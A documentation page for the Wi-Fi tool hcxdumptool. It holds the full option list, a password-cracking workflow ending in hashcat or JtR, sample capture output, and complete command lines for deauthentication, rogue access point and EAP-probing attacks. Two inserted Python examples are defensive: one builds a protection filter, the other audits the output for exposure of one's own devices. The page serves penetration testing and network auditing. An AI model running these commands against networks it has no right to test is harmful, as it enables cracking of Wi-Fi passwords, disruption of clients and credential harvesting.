hcxdumptool

hcxdumptool Description

A small tool for capturing packets from wireless network devices and detecting weaknesses in Wi-Fi networks (for example, PreSharedKey or PlainMasterKey are transmitted unencrypted by the CLIENT).

The pcapng capture format is compatible with Wireshark and tshark.

hcxdumptool is for analysis. This means everything is requested/saved by default. Unwanted information must be filtered later, offline.

Program features:

  • complete blocking of wlan traffic
  • can capture PMKIDs from access points (requires only one PMKID from access point) (use hcxpcapngtool to convert them to a format understandable by hashcat and/or JtR)
  • can capture handshakes from unconnected clients (requires only one single M2 from the client) (use hcxpcapngtool to convert them to a format understandable by hashcat and/or JtR)
  • can capture handshakes from 5/6 GHz clients on 2.4 GHz (requires only one single M2 from client) (use hcxpcapngtool to format to hashcat or JtR hash)
  • can capture passwords from wlan traffic (use hcxpcapngtool -E to save them to file along with network names)
  • can query and capture extended EAPOL (RADIUS, GSM-SIM, WPS) (hcxpcapngtool will show you info about them)
  • can collect IDs from wireless network traffic (for example: request IMSI numbers from mobile phones – use hcxpcapngtool -I to save them to a file)
  • can capture usernames from wlan traffic (eg: server authentication username – use hcxpcapngtool -U to save them to a file)

Homepage: https://github.com/ZerBea/hcxdumptool

Author: ZeroBeat

License: MIT

hcxdumptool Help

Usage:

hcxdumptool <options>

Options:

short options:
-i <interface> : interface (monitor mode will be enabled by hcxdumptool)
                 it is mandatory that the driver support ioctl() system calls, monitor mode and full packet injection!
-o <dump file> : output file in pcapng format, filename '-' outputs to stdout, '+' outputs to client
                 including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-f <frames>    : frames to save
                 bitmask:
                  0: clear default values
                  1: MANAGEMENT frames (default)
                  2: EAP and EAPOL frames (default)
                  4: IPV4 frames
                  8: IPV6 frames
                 16: WEP encrypted frames
                 32: WPA encrypted frames
                 64: vendor defined frames (AWDL)
                 to clear default values use -f 0 first, followed by desired frame type (e.g. -f 0 -f 4)
-c <digit>     : set frequency (2437,2462,5600,...) or channel (1,2,3, ...)
                 default: auto frequency/auto band
                 maximum entries: 255
                 0 - 1000 treated as channel
                   > 1000 treated as frequency in MHz
                 on 5 GHz and 6 GHz it is recommended to use frequency instead of channel number
                 because channel numbers are no longer unique
                 standard 802.11 channels (depend on device, driver and world regulatory domain):
                 https://en.wikipedia.org/wiki/List_of_WLAN_channels
-s <digit>     : set predefined scanlist
                 0 = auto frequency/auto band (default)
                 1 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (optimized 2.4GHz)
                 2 = 1,2,3,4,5,6,7,8,9,10,11,12,13 (standard 2.4 GHz)
                 3 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165 (standard 5GHz)
                 4 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165 (standard 2.4GHz/5GHz)
-t <seconds>   : stay time on frequency before hopping to the next channel
                 default 4 seconds
-m <interface> : set monitor mode by ioctl() system call and quit
-I             : show WLAN interfaces and quit
-C             : show available device channels and quit
                 if no frequencies are available, interface is probably in use or doesn't support monitor mode
                 if additional frequencies are available, firmware, driver and regulatory domain is probably patched
-h             : show this help
-v             : show version

long options:
--do_rcascan                       : show radio channel assignment (scan for target access points)
                                     this can be used to test that ioctl() calls and packet injection is working
                                     if you got no HIT, packet injection is possibly not working
                                     also it can be used to get information about the target
                                     and to determine that the target is in range
                                     use this mode to collect data for the filter list
                                     run this mode at least for 2 minutes
                                     to save all received raw packets use option -o
                                     default scanlist: channel 1 ...13
--rcascan_max=<digit>              : show only n highest ranking lines
                                     default: 256 lines
--rcascan_order=<digit>            : rcascan sorting order:
                                      0 = sort by PROBERESPONSE count (default)
                                      1 = sort by BEACON count
                                      2 = sort by CHANNEL
--do_targetscan=<MAC_AP>           : same as do_rcascan - hide all networks, except target
                                     format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66
--reason_code=<digit>              : deauthentication reason code
                                      recommended codes:
                                      1 WLAN_REASON_UNSPECIFIED
                                      2 WLAN_REASON_PREV_AUTH_NOT_VALID
                                      4 WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY
                                      5 WLAN_REASON_DISASSOC_AP_BUSY
                                      6 WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA
                                      7 WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA (default)
                                      9 WLAN_REASON_STA_REQ_ASSOC_WITHOUT_AUTH
--disable_client_attacks           : do not attack clients
                                     affected: ap-less (EAPOL 2/4 - M2) attack
--stop_client_m2_attacks=<digit>   : stop attacks against CLIENTS after 10 M2 frames received
                                     affected: ap-less (EAPOL 2/4 - M2) attack
                                     requires hcxpcapngtool --all option
--disable_ap_attacks               : do not attack access points
                                     affected: connected clients and client-less (PMKID) attack
--stop_ap_attacks=<digit>          : stop attacks against ACCESS POINTs if <n> BEACONs received
                                     default: stop after 600 BEACONs
--resume_ap_attacks=<digit>        : resume attacks against ACCESS POINTs after <n> BEACONs received
                                     default: 864000 BEACONs
--disable_deauthentication         : do not send deauthentication or disassociation frames
                                     affected: connected clients
--silent                           : do not transmit!
                                     hcxdumptool is acting like a passive dumper
                                     expect possible packet loss
--eapoltimeout=<digit>             : set EAPOL TIMEOUT (microseconds)
                                     default: 20000 usec
--eapoleaptimeout=<digit>          : set EAPOL EAP TIMEOUT (microseconds) over entire request sequence
                                     default: 2500000 usec
--bpfc=<file>                      : input kernel space Berkeley Packet Filter (BPF) code
                                     affected: incoming and outgoing traffic - that include rca scan
                                     steps to create a BPF (it only has to be done once):
                                      set hcxdumptool monitormode
                                       $ hcxdumptool -m <interface>
                                      create BPF to protect a MAC
                                       $ tcpdump -i <interface> not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf
                                       recommended to protect own devices
                                      or create BPF to attack a MAC
                                       $ tcpdump -i <interface> wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 -ddd > attack.bpf
                                       it is strongly recommended to allow all PROBEREQUEST frames (wlan_type mgt && wlan_subtype probe-req)
                                       see man pcap-filter for a list of all filter options
                                      to use the BPF code
                                       $ hcxdumptool -i <interface> --bpfc=attack.bpf ...
                                     notice: this is a protect/attack, a capture and a display filter
--filtermode=<digit>               : user space filter mode for filter list
                                     mandatory in combination with --filterlist_ap and/or --filterlist_client
                                     affected: only outgoing traffic
                                     notice: hcxdumptool acts as a passive dumper and will capture the whole traffic on the channel
                                     0: ignore filter list (default)
                                     1: use filter list as protection list
                                        do not interact with ACCESS POINTs and CLIENTs from this list
                                     2: use filter list as target list
                                        only interact with ACCESS POINTs and CLIENTs from this list
                                        not recommended, because some useful frames could be filtered out
                                     using a filter list doesn't have an effect on rca scan
                                     only useful for testing - devices to be protected should be added to BPF
                                     notice: this filter option will let hcxdumptool protect or attack a target - it is neither a capture nor a display filter
--filterlist_ap=<file or MAC>      : ACCESS POINT MAC or MAC filter list
                                     format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66 # comment
                                     maximum entries 256
                                     run first --do_rcascan to retrieve information about the target
--filterlist_ap_vendor=<file>      : ACCESS POINT VENDOR filter list
                                     format: 112233, 11:22:33, 11-22-33 # comment
                                     maximum entries 256
                                     run first --do_rcascan to retrieve information about the target
--filterlist_client=<file or MAC>  : CLIENT MAC or MAC filter list
                                     format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66 # comment
                                     maximum entries 256
                                     due to MAC randomization of the CLIENT, it does not always work!
--filterlist_client_vendor=<file>  : CLIENT VENDOR filter list
                                     format: 112233, 11:22:33, 11-22-33 # comment
                                     maximum entries 256
                                     due to MAC randomization of the CLIENT, it does not always work!
--weakcandidate=<password>         : use this pre shared key (8...63 characters) for weak candidate alert
                                     will be saved to pcapng to inform hcxpcaptool
                                     default: 12345678
--essidlist=<file>                 : transmit beacons from this ESSID list
                                     maximum total entries: 256 ESSIDs
--essidlist_wpaent=<file>          : transmit WPA-Enterprise-only beacons from this ESSID list
                                     maximum total entries: 256 ESSIDs
--active_beacon                    : transmit beacon from collected ESSIDs and from essidlist once every 10000000 nsec
                                     affected: ap-less
--flood_beacon                     : transmit beacon on every received beacon
                                     affected: ap-less
--all_m2                           : accept all connection attempts from a CLIENT
                                     affected: CLIENTs
                                     warning: that can prevent that a CLIENT can establish a connection to an assigned ACCESS POINT
--infinity                         : prevent that a CLIENT can establish a connection to an assigned ACCESS POINT
                                     affected: ACCESS POINTs and CLIENTs
--beaconparams=<TLVs>              : update or add Information Elements in all reactive and essidlist beacons
                                     maximum 50 IEs as TLV hex string, tag id 0 (ESSID) will be ignored, tag id 3 (channel) overwritten
                                     multiple IEs with same tag id are added, default IE is overwritten by the first
--wpaent                           : enable announcement of WPA-Enterprise in beacons and probe responses in addition to WPA-PSK
--eapreq=[:][:],...
                                     send max. 20 subsequent EAP requests after initial EAP ID request, hex string starting with EAP Type
                                     mode prefix determines the layer the request is exclusively sent on:
                                      T: = only if any TLS tunnel is up, ignored otherwise
                                     response is terminated with:
                                      :F = EAP Failure
                                      :S = EAP Success
                                      :I = EAP ERP Initiate
                                      :F = EAP ERP Finish
                                      :D = Deauthentication
                                      :T = TLS shutdown
                                      :- = no packet
                                     default behavior is terminating all responses with an EAP Failure, after the last one the client is deauthenticated
--eapreq_follownak                 : jump to Auth Type requested by client in Legacy Nak response, if type available in remaining request sequence
--eaptlstun                        : activate TLS tunnel negotiation and Phase 2 EAP requests when requesting PEAP using --eapreq
                                     requires --eap_server_cert and --eap_server_key
--eap_server_cert=<server.pem>     : EAP TLS tunnel Server cert PEM file
--eap_server_key=<server.key>      : EAP TLS tunnel Server private key file
--use_gps_device=<device>          : use GPS device
                                     /dev/ttyACM0, /dev/ttyUSB0, ...
                                     NMEA 0183 $GPGGA $GPGGA
--use_gpsd                         : use GPSD device
                                     NMEA 0183 $GPGGA, $GPRMC
--nmea=<file>                      : save track to file
                                     format: NMEA 0183 $GPGGA, $GPRMC, $GPWPL
                                     to convert it to gpx, use GPSBabel:
                                     gpsbabel -i nmea -f hcxdumptool.nmea -o gpx -F file.gpx
                                     to display the track, open file.gpx with viking
--gpio_button=<digit>              : Raspberry Pi GPIO pin number of button (2...27)
                                     default = GPIO not in use
--gpio_statusled=<digit>           : Raspberry Pi GPIO number of status LED (2...27)
                                     default = GPIO not in use
--gpio_statusled_intervall=<digit> : Raspberry Pi GPIO LED flash interval
                                     default = flash every 5 seconds
--tot=<digit>                      : enable timeout timer in minutes (minimum = 2 minutes)
                                     hcxdumptool will terminate if tot reached (EXIT code = 2)
                                     for a successful attack tot > 120 minutes recommended
--error_max=<digit>                : terminate hcxdumptool if error maximum reached
                                     default: 100 errors
--reboot                           : once hcxdumptool terminated, reboot system
--poweroff                         : once hcxdumptool terminated, power off system
--enable_status=<digit>            : enable real-time display (waterfall)
                                     only incoming traffic
                                     each message is displayed only once at the first occurrence to avoid spamming the real-time display
                                     bitmask:
                                         0: no status (default)
                                         1: EAPOL
                                         2: ASSOCIATION and REASSOCIATION
                                         4: AUTHENTICATION
                                         8: BEACON and PROBERESPONSE
                                        16: ROGUE AP
                                        32: GPS (once a minute)
                                        64: internal status (once a minute)
                                       128: run as server
                                       256: run as client
                                       512: EAP
                                      1024: EAP NAK
                                     characters < 0x20 && > 0x7e are replaced by .
                                     example: show everything but don't run as server or client (1+2+4+8+16 = 31)
                                              show only EAPOL and ASSOCIATION and REASSOCIATION (1+2 = 3)
--ip=<IP address>                  : define IP address for server / client (default: 224.0.0.255)
                                     multicast, localhost or client unicast IP address on both sides
--server_port=<digit>              : define port for server status output (1...65535)
                                     default IP: 224.0.0.255
                                     default port: 60123
--client_port=<digit>              : define port for client status read (1...65535)
                                     default IP: 224.0.0.255
                                     default port: 60123
--check_driver                     : run several tests to determine that the driver supports all(!) required ioctl() system calls
                                     the driver must support monitor mode and full packet injection
                                     otherwise hcxdumptool will not work as expected
--check_injection                  : run antenna test and packet injection test to determine that the driver supports full packet injection
                                     packet injection will not work as expected if the Wireless Regulatory Domain is unset
--force_interface                  : ignore all ioctl() warnings and error counter
                                     allow hcxdumptool to run on a virtual NETLINK monitor interface
                                     warning: packet injection and/or channel change may not work as expected
                                     you have been warned: do not report issues!
--example                          : show abbreviations and example command lines
--help                             : show this help
--version                          : show version
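The --bpfc steps above say to compile a BPF once with tcpdump -ddd to protect your own devices, and the --filterlist_ap / --filterlist_client options accept MAC lists in three spellings with # comments and a 256-entry limit. The following is an added example (not part of hcxdumptool or the hcxtools project): it parses such a list, normalizes the entries, and builds the pcap-filter expression and tcpdump command line for the protection BPF, always admitting PROBEREQUEST frames as the help recommends. The function names, the SAMPLE_LIST contents and the wlan0 interface name are constructed assumptions; the filter syntax follows man pcap-filter.

```python
"""Parse an hcxdumptool-style MAC filter list and emit the tcpdump command
that compiles a *protection* BPF for those devices.

Added example, not hcxdumptool's own code. Assumptions: function names,
the constructed SAMPLE_LIST, and that you run the printed tcpdump command
yourself while the interface is in monitor mode (hcxdumptool -m <interface>).
"""
import re

MAX_ENTRIES = 256          # limit stated in the --filterlist_* help text
_HEX = re.compile(r"^[0-9a-f]+$")


def normalize_mac(token: str, nibbles: int = 12) -> str:
    """Accept 112233445566, 11:22:33:44:55:66 or 11-22-33-44-55-66
    (nibbles=6 for the vendor-prefix form) and return lowercase hex."""
    hexdigits = token.strip().lower().replace(":", "").replace("-", "")
    if len(hexdigits) != nibbles or not _HEX.match(hexdigits):
        raise ValueError(f"bad MAC/vendor entry: {token!r}")
    return hexdigits


def parse_filter_list(text: str, nibbles: int = 12) -> list:
    """One entry per line, '#' starts a comment, blank lines are ignored,
    duplicates are dropped, more than MAX_ENTRIES entries is an error."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        mac = normalize_mac(line, nibbles)
        if mac not in entries:
            entries.append(mac)
        if len(entries) > MAX_ENTRIES:
            raise ValueError(f"more than {MAX_ENTRIES} entries (line {lineno})")
    return entries


def colon_mac(hexdigits: str) -> str:
    """tcpdump expects 11:22:33:44:55:66 notation."""
    return ":".join(hexdigits[i:i + 2] for i in range(0, len(hexdigits), 2))


def protect_filter_expression(macs: list) -> str:
    """pcap-filter expression that drops every frame sent to or from the
    listed devices (the 'protect a MAC' step of the --bpfc help) while still
    admitting all PROBEREQUEST frames, as the help strongly recommends."""
    if not macs:
        raise ValueError("protection list is empty")
    clauses = []
    for mac in macs:
        cm = colon_mac(mac)
        clauses.append(f"not wlan addr1 {cm} and not wlan addr2 {cm}")
    return "(type mgt subtype probe-req) or (" + " and ".join(clauses) + ")"


def tcpdump_command(interface: str, macs: list, outfile: str = "protect.bpf") -> str:
    """Command to run once on the monitor-mode interface; -ddd emits the
    compiled BPF in the format hcxdumptool's --bpfc=<file> reads."""
    expr = protect_filter_expression(macs)
    return f"tcpdump -i {interface} '{expr}' -ddd > {outfile}"


# Constructed sample list (not real devices): one own AP, two own clients.
SAMPLE_LIST = """
# own access point
11:22:33:44:55:66   # living room AP
# own clients
aa-bb-cc-dd-ee-01
aabbccddee02        # laptop
aabbccddee02        # duplicate, dropped
"""

if __name__ == "__main__":
    own = parse_filter_list(SAMPLE_LIST)
    print(own)
    print(tcpdump_command("wlan0", own))
```

The same parser handles vendor lists by calling parse_filter_list(text, nibbles=6); the tcpdump step is deliberately printed rather than executed, so you can review the expression before compiling it on the capture interface.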

Recommended usage guidelines

Do not use a logical interface and leave the physical interface in managed mode.

Do not use hcxdumptool in combination with aircrack-ng, reaver, bully or other tools which take access to the interface.

Stop all services which take access to the physical interface (NetworkManager, wpa_supplicant, …).

Do not use tools like macchanger, as they are useless, because hcxdumptool uses its own random MAC address space.

Work flow

The sequence of using the tools is as follows: hcxdumptool → hcxpcapngtool → hcxhashtool (additionally hcxpsktool/hcxeiutool) → hashcat or JtR

  1. hcxdumptool: attack and capture everything (depending on options)
  2. hcxpcapngtool: convert everything
  3. hcxhashtool: filter hashes
  4. hcxpsktool: get weak PSK candidates
  5. hcxeiutool: calculate wordlists from ESSID
  6. hashcat or JtR: get PSK from hash

Recommendations

  • Make sure that the Wireless Regulatory Domain is not unset!
  • Run

    sudo hcxdumptool -i interface --do_rcascan

    for at least 30 seconds, to get information about the target!

  • Do not edit, merge or convert these pcapng files, because it will remove optional comment fields!
  • It is much better to run gzip to compress the files. Wireshark, tshark and hcxpcapngtool will understand this, as well as wpa-sec.stanev.org.
  • If hcxdumptool captured your password from WiFi traffic, you should check all your devices immediately!
  • If you use GPS, make sure GPS device is inserted and has a GPS FIX, before you start hcxdumptool!
  • Recommended tools to show additional 802.11 fields or to decrypt WiFi traffic: Wireshark and/or tshark
  • Recommended tool to convert hashes to formats that hashcat and JtR understand: hcxpcapngtool
  • Recommended tool to get possible PSKs from pcapng file: hcxpcapngtool
  • Important notice: using filter options could cause some useful frames to be filtered out! In that case hcxpcapngtool will show a warning that these frames are missing!
  • Use SIGHUP with care, because it will impact pselect()

Abbreviations

  • PMKIDROGUE = PMKID requested from ACCESS POINT by hcxdumptool
  • M1M2ROGUE = M2 requested from CLIENT by hcxdumptool
  • M1M2 = CHALLENGE MESSAGE PAIR
  • M2M3 = AUTHORIZED MESSAGE PAIR
  • M3M4 = AUTHORIZED MESSAGE PAIR
  • M1M4ZEROED = M4 SNONCE is zeroed and cannot be used to calculate MESSAGE PAIR
  • M3M4ZEROED = M4 SNONCE is zeroed and cannot be used to calculate MESSAGE PAIR
  • KDV0 = Key Descriptor Version 0 = Authentication Management Key defined
  • KDV1 = Key Descriptor Version 1 = WPA1 HMAC-MD5
  • KDV2 = Key Descriptor Version 2 = WPA2 HMAC-SHA1
  • KDV3 = Key Descriptor Version 3 = WPA2 AES-128-CMAC

hcxdumptool Usage Example

Use the wireless interface (-i wlp39s0f3u4u5), it will be automatically switched to monitor mode, save the captured frames to a pcapng file (-o output.pcapng), stay on each channel for 5 seconds (-t 5), show EAPOL messages and PROBEREQUEST/PROBERESPONSE (--enable_status=3):

sudo hcxdumptool -i wlp39s0f3u4u5 -o output.pcapng -t 5 --enable_status=3

Example output:

start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
INTERFACE NAME............: wlp0s20f0u2
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 36 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 00c0ca96cfcb (not used for the attack)
INTERFACE VIRTUAL MAC.....: 00c0ca96cfcb (not used for the attack)
DRIVER....................: ath9k_htc
DRIVER VERSION............: 5.16.8-arch1-1
DRIVER FIRMWARE VERSION...: 1.4
openSSL version...........: 1.1
ERRORMAX..................: 100 errors
BPF code blocks...........: 0
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: 000e1726743a (BROADCAST HIDDEN used for the attack)
ACCESS POINT (ROGUE)......: 000e1726743b (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: 000e1726743c (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: b025aac62e0f
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 62969
ANONCE....................: 5630c66168cdb3f4a93da3509541b808afd72bf2e848576f822b8ddd3e6a1006
SNONCE....................: 3f4872fcafb3165345aa603842c7f01039763994419cbd80ada5fa239f7673bf

10:28:24 2412/1   ffffffffffff c891f9c7eff6 RT-728005 [BEACON]
10:28:24 2412/1   ffffffffffff 142e5e5636f0 RT-WiFi-36EE [BEACON]
10:28:24 2412/1   ffffffffffff e4186b1abe4c 114 [BEACON]
10:28:24 2412/1   ffffffffffff e8377a94a520 Keenetic-1606 [BEACON]
10:28:25 2412/1   7aa0dc189b9b c891f9c7eff6 RT-728005 [PROBERESPONSE]
10:28:25 2412/1   7aa0dc189b9b e4186b1abe4c 114 [PROBERESPONSE]
10:28:25 2412/1   ffffffffffff 6466b3489a20 TP-LINK_489A20 [BEACON]
10:28:26 2412/1   ffffffffffff f0b4d29f8889 DIR-615-8888 [BEACON]
10:28:26 2412/1   ffffffffffff bc0f9a24a294 DIR-615-A293 [BEACON]
10:28:28 2412/1   ffffffffffff 78321b502db0 DIR-615 [BEACON]
10:28:28 2412/1   b025aac62e0f c891f9c7eff6 RT-728005 [PMKIDROGUE:7a611b478d7ad30d13f884033de72a6d KDV:2]
10:28:33 2412/1   daa119a3ce9b 6466b3489a20 TP-LINK_489A20 [PROBERESPONSE]
10:28:36 2412/1   d8a98ba2e8f8 f0b4d29f8889 DIR-615-8888 [PROBERESPONSE]
10:28:39 2412/1   304a261d7203 bc0f9a24a294 DIR-615-A293 [PROBERESPONSE]
10:28:48 2412/1   52983911000d e8377a94a520 Keenetic-1606 [PROBERESPONSE]
10:28:52 2412/1   ffffffffffff 24d3f2aa99a5 RT-WiFi_66 [BEACON]
10:29:25 2412/1   4c6371e0e52e 142e5e5636f0 RT-WiFi-36EE [PROBERESPONSE]
10:29:42 2412/1   d8c0a6b19e25 78321b503d48 DIR-615-3D47 [PROBERESPONSE]
10:30:00 2417/2   ffffffffffff d8af817653ce RT-WiFi-53CD [BEACON]
10:30:00 2417/2   ffffffffffff ec43f6dc7d68 Jenechka [BEACON]
10:30:00 2417/2   ffffffffffff 045ea4543b86 [HIDDEN BEACON]
10:30:02 2417/2   402f86f57436 ec43f6dc7d68 Jenechka [PROBERESPONSE]
10:30:08 2417/2   304a261d7203 d8af817653ce RT-WiFi-53CD [PROBERESPONSE]
10:30:11 2417/2   ffffffffffff c471544fbb30 TP-LINK_BB30 [BEACON]
10:30:26 2417/2   9444443388b6 000e1726743e Moto G (5S) Plus 110282 [AUTHENTICATION]
10:30:26 2417/2   9444443388b6 000e1726743e Moto G (5S) Plus 110282 [ASSOCIATION]
10:30:44 2417/2   9444443388b6 000e1726743e Moto G (5S) Plus 110282 [REASSOCIATION]
10:30:57 2417/2   ffffffffffff f8f082b2d0df trytek_76 [BEACON]
10:31:47 2417/2   008e7af12a6e 000e1726743f RT-104 [AUTHENTICATION]
10:31:47 2417/2   008e7af12a6e 000e1726743f RT-104 [ASSOCIATION]
10:31:47 2417/2   008e7af12a6e 000e1726743f RT-104 [EAPOL:M1M2ROGUE EAPOLTIME:169 RC:62969 KDV:2]
10:31:57 2417/2   586356f41838 c471544fbb30 TP-LINK_BB30 [PROBERESPONSE]
10:32:00 2422/3   ffffffffffff f81a67494462 Old'est_WEB [BEACON]
10:32:05 2422/3   daa119f66eb6 e865d48431c1 Tenda_8431C0 [PROBERESPONSE]
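The waterfall above is also the place where a network owner learns whether their own equipment is exposed: a PMKIDROGUE line shows an access point handing out a PMKID to hcxdumptool's rogue client, and an EAPOL:M1M2ROGUE line shows a client answering a rogue access point's M1 with a usable M2. The following added example (not part of hcxdumptool) parses these status lines and flags the ones that involve devices you own. The sample lines are copied from the example output above; the OWN_APS / OWN_CLIENTS sets, the finding codes and the function names are constructed assumptions, as is the column reading (after the timestamp and frequency/channel come two MACs, the station or receiver first and the access point second, since beacons show ffffffffffff first, then the ESSID, then the bracketed event).

```python
"""Parse hcxdumptool real-time status lines and flag events involving
devices listed as your own. Added example, not hcxdumptool's own code.
Assumptions: the column reading described in the lead-in, the constructed
OWN_* sets, and the finding codes used below.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

LINE_RE = re.compile(
    r"^(?P<time>\d\d:\d\d:\d\d)\s+(?P<freq>\d+)/(?P<chan>\d+)\s+"
    r"(?P<sta>[0-9a-f]{12})\s+(?P<ap>[0-9a-f]{12})\s+"
    r"(?P<essid>.*?)\s*\[(?P<event>[^\]]*)\]$"
)


@dataclass
class Event:
    time: str
    freq: int
    chan: int
    sta: str      # first MAC column (station / receiver, ffffffffffff for broadcast)
    ap: str       # second MAC column (access point, rogue or real)
    essid: str    # empty for hidden beacons
    kind: str     # text before the first ':' inside the brackets, e.g. EAPOL
    detail: str   # rest of the bracket text, e.g. M1M2ROGUE EAPOLTIME:169 ...


def parse_line(line: str) -> Optional[Event]:
    """Return an Event for a status line, or None for header/other lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    kind, _, detail = m["event"].partition(":")
    return Event(m["time"], int(m["freq"]), int(m["chan"]), m["sta"], m["ap"],
                 m["essid"], kind.strip(), detail.strip())


# Finding codes (constructed for this example).
PMKID_RELEASED = "PMKID_RELEASED"        # own AP gave a PMKID to the rogue client
M2_TO_ROGUE_AP = "M2_TO_ROGUE_AP"        # own client answered a rogue AP's M1
JOINED_FOREIGN_AP = "JOINED_FOREIGN_AP"  # own client auth/assoc with an AP not ours


def audit(lines: List[str], own_aps: Set[str], own_clients: Set[str]) -> List[Tuple[str, str, str, str]]:
    """Return (time, code, mac, essid) for every line that shows one of your
    devices exposing hash material or joining an AP you do not operate."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev.kind == "PMKIDROGUE" and ev.ap in own_aps:
            findings.append((ev.time, PMKID_RELEASED, ev.ap, ev.essid))
        elif ev.kind == "EAPOL" and "M1M2ROGUE" in ev.detail and ev.sta in own_clients:
            findings.append((ev.time, M2_TO_ROGUE_AP, ev.sta, ev.essid))
        elif (ev.kind in ("AUTHENTICATION", "ASSOCIATION", "REASSOCIATION")
              and ev.sta in own_clients and ev.ap not in own_aps):
            findings.append((ev.time, JOINED_FOREIGN_AP, ev.sta, ev.essid))
    return findings


# Sample lines copied from the example output on this page.
SAMPLE_LINES = [
    "10:28:24 2412/1   ffffffffffff c891f9c7eff6 RT-728005 [BEACON]",
    "10:28:25 2412/1   7aa0dc189b9b c891f9c7eff6 RT-728005 [PROBERESPONSE]",
    "10:28:28 2412/1   b025aac62e0f c891f9c7eff6 RT-728005 [PMKIDROGUE:7a611b478d7ad30d13f884033de72a6d KDV:2]",
    "10:30:00 2417/2   ffffffffffff 045ea4543b86 [HIDDEN BEACON]",
    "10:30:26 2417/2   9444443388b6 000e1726743e Moto G (5S) Plus 110282 [AUTHENTICATION]",
    "10:30:26 2417/2   9444443388b6 000e1726743e Moto G (5S) Plus 110282 [ASSOCIATION]",
    "10:30:44 2417/2   9444443388b6 000e1726743e Moto G (5S) Plus 110282 [REASSOCIATION]",
    "10:31:47 2417/2   008e7af12a6e 000e1726743f RT-104 [AUTHENTICATION]",
    "10:31:47 2417/2   008e7af12a6e 000e1726743f RT-104 [ASSOCIATION]",
    "10:31:47 2417/2   008e7af12a6e 000e1726743f RT-104 [EAPOL:M1M2ROGUE EAPOLTIME:169 RC:62969 KDV:2]",
    "10:32:05 2422/3   daa119f66eb6 e865d48431c1 Tenda_8431C0 [PROBERESPONSE]",
]

# Constructed ownership sets: pretend RT-728005 is our AP and two clients are ours.
OWN_APS = {"c891f9c7eff6"}
OWN_CLIENTS = {"008e7af12a6e", "9444443388b6"}

if __name__ == "__main__":
    for finding in audit(SAMPLE_LINES, OWN_APS, OWN_CLIENTS):
        print(finding)
```

Run against a saved waterfall (or the --enable_status output piped through tee), a PMKID_RELEASED or M2_TO_ROGUE_AP finding for your own hardware is exactly the situation the recommendations describe: the captured material can be converted by hcxpcapngtool and handed to hashcat or JtR, so the PSK of that network should be treated as exposed. JOINED_FOREIGN_AP findings show a client that accepted an access point announcing a remembered ESSID; the only fix on the client side is to remove that saved network.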

Modified Raspberry Pi, aggressive mode with deauthentication (default), mobile (fast switching between channels, this is the default), targets APs (default) and CLIENTS (--active_beacon):

sudo hcxdumptool --gpio_button=4 --gpio_statusled=17 -i wlan0 -o dump.pcapng --poweroff --stop_ap_attacks=6000 --resume_ap_attacks=12000 --bpfc=own.bpfc --essidlist=beaconlist --active_beacon

Modified Raspberry Pi, stationary (long switching between channels “-t 120”), targets CLIENTS (--disable_deauthentication --disable_ap_attacks --active_beacon):

sudo hcxdumptool --gpio_button=4 --gpio_statusled=17 -i wlan0 -o dump.pcapng --tot=1440 --bpfc=own.bpfc --disable_deauthentication --disable_ap_attacks --active_beacon -c 1,3,5,7,9,11,2,4,6,8,10 -t 120

Client-only EAP probing attack using tunneled PEAP sequence MS-CHAP-V2, EAP-MD5, GTC:

sudo hcxdumptool -i wlan0 -t 120 -o dump.pcapng --enable_status=1567 --disable_deauthentication --disable_ap_attacks --wpaent --eaptlstun --eap_server_cert=server.crt --eap_server_key=server.key --eapreq=1921:-,T:1a0104001610000102030405060708090a0b0c0d0e0f20:-,T:04010020:-,T:06:-

How to install hcxdumptool

Installation on Kali Linux

sudo apt install hcxdumptool

Installation on BlackArch

sudo pacman -S hcxdumptool

Installation on Debian, Linux Mint, Ubuntu and their derivatives

sudo apt install libssl1.1 libssl-dev git
git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool/
make
sudo make install
